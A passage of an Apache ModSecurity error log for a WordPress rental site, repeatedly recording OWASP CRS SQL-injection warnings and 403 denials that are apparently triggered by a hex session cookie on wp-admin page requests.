"/wp-admin/edit.php"] [unique_id "agIFoFV4kyjgo4bQBUiCSAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:48.277542 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFoFV4kyjgo4bQBUiCSAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:48.881970 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFoFV4kyjgo4bQBUiCSAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:49.176180 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFoVV4kyjgo4bQBUiCSgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:49.176525 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFoVV4kyjgo4bQBUiCSgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:49.806470 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFoVV4kyjgo4bQBUiCSgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:50.442907 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFolV4kyjgo4bQBUiCTAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:50.443201 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFolV4kyjgo4bQBUiCTAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:51.063225 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFolV4kyjgo4bQBUiCTAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:51.210968 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFo1V4kyjgo4bQBUiCTQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:51.211264 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFo1V4kyjgo4bQBUiCTQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:51.880965 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFo1V4kyjgo4bQBUiCTQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:52.004919 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFpFV4kyjgo4bQBUiCTwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:52.005243 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFpFV4kyjgo4bQBUiCTwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:52.398344 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFpFV4kyjgo4bQBUiCTwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:53.227532 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFpVV4kyjgo4bQBUiCVwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:53.227825 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFpVV4kyjgo4bQBUiCVwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:54.459757 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFpVV4kyjgo4bQBUiCVwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:54.570304 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFplV4kyjgo4bQBUiCWAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:54.570580 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFplV4kyjgo4bQBUiCWAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:55.190054 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFplV4kyjgo4bQBUiCWAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:55.583408 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFp1V4kyjgo4bQBUiCXQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:55.583685 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFp1V4kyjgo4bQBUiCXQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:56.185191 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFp1V4kyjgo4bQBUiCXQAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:56.911848 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFqFV4kyjgo4bQBUiCXwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:56.912125 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFqFV4kyjgo4bQBUiCXwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:57.531913 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFqFV4kyjgo4bQBUiCXwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:57.621083 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFqVV4kyjgo4bQBUiCYAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:57.621379 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFqVV4kyjgo4bQBUiCYAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:58.184688 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFqVV4kyjgo4bQBUiCYAAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:58.340706 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFqlV4kyjgo4bQBUiCYgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:58.340959 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFqlV4kyjgo4bQBUiCYgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:58.707052 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFqlV4kyjgo4bQBUiCYgAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:59.158216 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFq1V4kyjgo4bQBUiCYwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:59.158504 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFq1V4kyjgo4bQBUiCYwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:59.789604 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFq1V4kyjgo4bQBUiCYwAAAM8"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:37:00.232432 2026] [security2:error] [pid 1416109:tid 1416145] [client 31.57.184.104:55280] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri 